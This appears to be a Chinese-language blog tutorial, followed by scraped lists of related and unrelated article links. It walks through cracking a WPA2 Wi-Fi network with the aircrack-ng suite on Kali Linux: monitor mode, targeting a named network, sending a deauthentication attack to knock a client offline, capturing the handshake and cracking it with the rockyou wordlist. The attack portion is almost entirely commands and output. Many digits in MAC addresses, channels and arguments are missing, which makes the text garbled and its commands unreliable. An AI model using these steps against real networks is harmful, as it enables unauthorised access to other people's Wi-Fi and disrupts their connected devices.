1.查看网卡名称:iwconfig

有一块 名为wlan0 的无线网卡通过一下命令排除影响因素

root@jkali:~# iwconfig

lo        no wireless extensions.

wlan0     IEEE 802.11  ESSID:"jlysltqx"

          Mode:Managed  Frequency:2.462 GHz  Access Point: :6C::0A:CE:7D

          Bit Rate=144.4 Mb/s   Tx-Power= dBm

          Retry short limit:   RTS thr:off   Fragment thr:off

          Encryption key:off

          Power Management:on

          Link Quality=/  Signal level=- dBm

          Rx invalid nwid:  Rx invalid crypt:  Rx invalid frag:

          Tx excessive retries:  Invalid misc:   Missed beacon:

2.通过一下命令排除影响因素

root@jkali:~# service network-manager stop

root@jkali:~# airmon-ng check kill

Killing these processes:

  PID Name

  wpa_supplicant

3.启动monitor 模式

root@jkali:~# airmon-ng start wlan0

PHY    Interface    Driver        Chipset

phy0    wlan0        iwlwifi        Intel Corporation Wireless  /  (rev )

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)

        (mac80211 station mode vif disabled for [phy0]wlan0)

4.查看是否进入了监控模式

root@jkali:~# iwconfig

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power= dBm

          Retry short limit:   RTS thr:off   Fragment thr:off

          Power Management:on

lo        no wireless extensions.

5.进行抓包

root@jkali:~# airodump-ng wlan0mon

 CH   ][ Elapsed:  s ][ -- :                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 0C:4B::0A:0A:B5   -                         -   WPA              <length:  >

 :6C::0A:CE:7D  -                         WPA2 CCMP   PSK  jlysltqx

 0C:6A:BC::AB:ED  -                         WPA2 CCMP   PSK  ChinaNet-fG5b

 :::C6::0C  -                          WPA2 CCMP   PSK  ChinaNet-sWTz

 E0:::7F::  -                           WPA2 CCMP   PSK  ChinaNet-SrPw

 :1D::3B::E8  -                          WPA2 CCMP   PSK  CMCC-er99

 8E:::C9::EB  -                          WPA2 CCMP   PSK  Guest_53EB

 :::C9::EB  -                          WPA2 CCMP   PSK  Master

 BC:D1::BD:F1:  -                           WPA2 CCMP   PSK  ¬����      

我们来抓jlysltqx,他的bssid为::6C::0A:CE:7D,ch 为 ,加密方式为wpa2

6.只抓我们要的wifi 的包

root@jkali:~/kk# airodump-ng wlan0mon --bssid 28:6C:07:0A:CE:7D -c 11 -w wpa

 CH  ][ Elapsed:  s ][ -- :                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 :6C::0A:CE:7D  -                    WPA2 CCMP   PSK  jlysltqx                                                                       

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                   

 :6C::0A:CE:7D  3C:B6:B7:E0:4C:  -    0e- 0e

 :6C::0A:CE:7D  :3E::2A::6A  -     -

7.6中未获取到握手信息,我们把其中一台设备断网,让其重连来航偶去握手信息

aireplay-ng -  -a :6C::0A:CE:7D -c 3C:B6:B7:E0:4C: wlan0mon

8.重新执行6获取握手信息

root@jkali:~/kk# airodump-ng wlan0mon --bssid :6C::0A:CE:7D -c  -w wpa

 CH  ][ Elapsed:  min ][ -- : ][ WPA handshake: :6C::0A:CE:7D                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 :6C::0A:CE:7D  -                        WPA2 CCMP   PSK  jlysltqx                                                                       

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                   

 :6C::0A:CE:7D  3C:B6:B7:E0:4C:  -    0e- 0e         jlysltqx

 :6C::0A:CE:7D  :3E::2A::6A  -     -

9.查看抓到的包 wpa-04.cap 就是我们抓成功的包

root@jkali:~/kk# ls -lrt

总用量

-rw-r--r--  root root      1月   : wpa-.kismet.netxml

-rw-r--r--  root root       1月   : wpa-.kismet.csv

-rw-r--r--  root root       1月   : wpa-.csv

-rw-r--r--  root root      1月   : wpa-.cap

-rw-r--r--  root root      1月   : wpa-.kismet.netxml

-rw-r--r--  root root       1月   : wpa-.kismet.csv

-rw-r--r--  root root       1月   : wpa-.csv

-rw-r--r--  root root     1月   : wpa-.cap

-rw-r--r--  root root      1月   : wpa-.kismet.netxml

-rw-r--r--  root root       1月   : wpa-.kismet.csv

-rw-r--r--  root root       1月   : wpa-.csv

-rw-r--r--  root root  1月   : wpa-.cap

-rw-r--r--  root root      1月   : wpa-.kismet.netxml

-rw-r--r--  root root       1月   : wpa-.kismet.csv

-rw-r--r--  root root       1月   : wpa-.csv

-rw-r--r--  root root   1月   : wpa-.cap

10.利用字典来进行解密(若字典文件未解压,请自行解压)

aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-.cap

11.破解完成后恢复网络

root@jkali:~# service network-manager start
root@jkali:~# airmon-ng stop wlan0mon

PHY    Interface    Driver        Chipset

phy0    wlan0mon    iwlwifi        Intel Corporation Wireless  /  (rev )

        (mac80211 station mode vif enabled on [phy0]wlan0)

        (mac80211 monitor mode vif disabled for [phy0]wlan0mon)

kali 破解wifi的更多相关文章

  1. 利用kali破解wifi密码

    准备工具 1.笔记本 2.USB无线上网卡(必备) 3.kali系统 4.密码字典 第一种方法 暴力破解法 何为暴力破解呢,其实就是一个一个密码去试,直到正确的密码. 现在的wifi一般加密都是: 1 ...

  2. kali破解wifi密码

    开始 1.选择合适的网卡,有些网卡kali识别不了,我用的网卡信息 2.网卡开启监听模式 3.查看监听模式是否开启成功(网卡名称变成wlan0mon说明已经开启成功) 4.输入“airodump-ng ...

  3. Kali Linux下破解WIFI密码挂载usb无线网卡的方法

    Kali Linux下破解WIFI密码挂载usb无线网卡的方法 时间:2014-10-12    来源:服务器之家    投稿:root 首先我要说的是,wifi密码的破解不是想象中的那么容易,目前还 ...

  4. Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)

    Kali Linux能做很多事,但是它主要以渗透测试及'破解wifi密码'闻名. 如果你使用Macbook 请看 使用macbook破解WPA/WPA2 wifi密码 要求: 安装有Kali Linu ...

  5. Kali Linux破解wifi密码(无须外置网卡)

    环境准备:  方式一(选择该方式):Kali Linux.笔记本一台.U盘(至少8G)  方式二:Kali Linux.外置网卡.笔记本一台.VM   特别说明,主要是使用方式一进行破解,如果有外置网 ...

  6. 运用Fluxion高效破解WiFi密码

    Fluxion是一个无线破解工具,这个工具有点像是Linset的翻版.但是与Linset比较起来,它有着更多有趣的功能.目前这个工具在Kali Linux上可以完美运行. 工作原理 1.扫描能够接收到 ...

  7. 破解Wifi

    牛刀小试:Wifi破解的原理. 准备工具:   1:Kali Linux系统 2:一块好用的无线网卡 (推荐免驱版,网上也有推荐,可以去百度上google一下) 3:WPA字典(用来爆破抓获的握手包) ...

  8. 【无线安全实践入门】破解WiFi密码的多个方法

    本文希望可以帮助到想要学习接触此方面.或兴趣使然的你,让你有个大概的印象. 文中可能存在错误操作或错误理解,望大家不吝指正. !阅前须知! 本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时的 ...

  9. 破解WIFI教程

    今日主题:如何破解WIFI 准备工具 笔记本一台 usb无线网卡[我用的是小米的] kali系统[可以在虚拟机里装,建议用2019年及以下版本] VMware Workstation15虚拟机安装 可 ...

随机推荐

  1. Java虚拟机内存区域详解

    JVM 运行时的数据区域 首先获取一个直观的认识: 总共也就这么 5 个区(直接内存不属于 JVM 运行时数据区的一部分),除了程序计数器其他的地方都有可能出现 OOM (OutOfMemoryErr ...

  2. DP之背包

    一.01背包: (以下均可用一维来写 即只能选择一次的物品装在一定容积的背包中.f[i][j]表示前i件物品在容积为j时的最大价值. for(int i = 1; i <= n ;  i++){ ...

  3. ElasticSearch(九)e代驾使用Elasticsearch流程设计(Yii1版本)

    一.控制器层的更新.添加.删除 class AddKnowledgeAction extends CAction { //add and update public function actionPo ...

  4. Linux实用指令(5)

    指定运行级别(系统的制定级别配置文件/etc/inittab): 0:关机 1:单用户(单用户级别root登录不需要密码,进入之后重新设置密码) 2:多用户无网络服务 3:多用户有网络服务 4:系统未 ...

  5. 获取apache ignite缓存中的数据行数少于实际行数

    我将ignite项目打包放到linux下,在linux下获取window中存放在oracle数据库中的数据,linux服务器作为ignite的服务端节点,我在本地启动tomact,作为ignite客户 ...

  6. 浓缩版java8新特性

    目录 一.Lambda 1.定义/设计原因 2.结构 3.规则 4.使用 二.函数式接口 1.定义 2.设计原因 3.使用 三.方法引用 1.定义/设计原因 2.使用 四.接口的默认方法 1.定义 2 ...

  7. 个人项目-wc

    个人项目-WC   (C语言) 一.Github地址:https://github.com/Lin-J-F/WC 二.PSP表格 PSP2.1 Personal Software Process St ...

  8. SqlServer数据库优化之索引、临时表

    问题:工作是查询一张500万多条数据的表时,查询总是很慢,于是进行优化. --查询表所有索引 use RYTreasureDB EXEC Sp_helpindex [RecordDrawScore] ...

  9. K8S 上搭建 Redis

    根据需求搭建一个不需要数据持久化,需要密码登录的 Redis mkdir /iba/qa_ibaboss_elk -p cd /iba/qa_ibaboss_elk # 创建一个专用的 namespa ...

  10. windows打印机服务自动关闭解决方案

    先点击右键点属性,启动方式选自动,然后(1)删除 C:\WINDOWS\system32\spool\PRINTERS 目录下的所有文件.(2)删除注册表 \HKEY_LOCAL_MACHINE\SY ...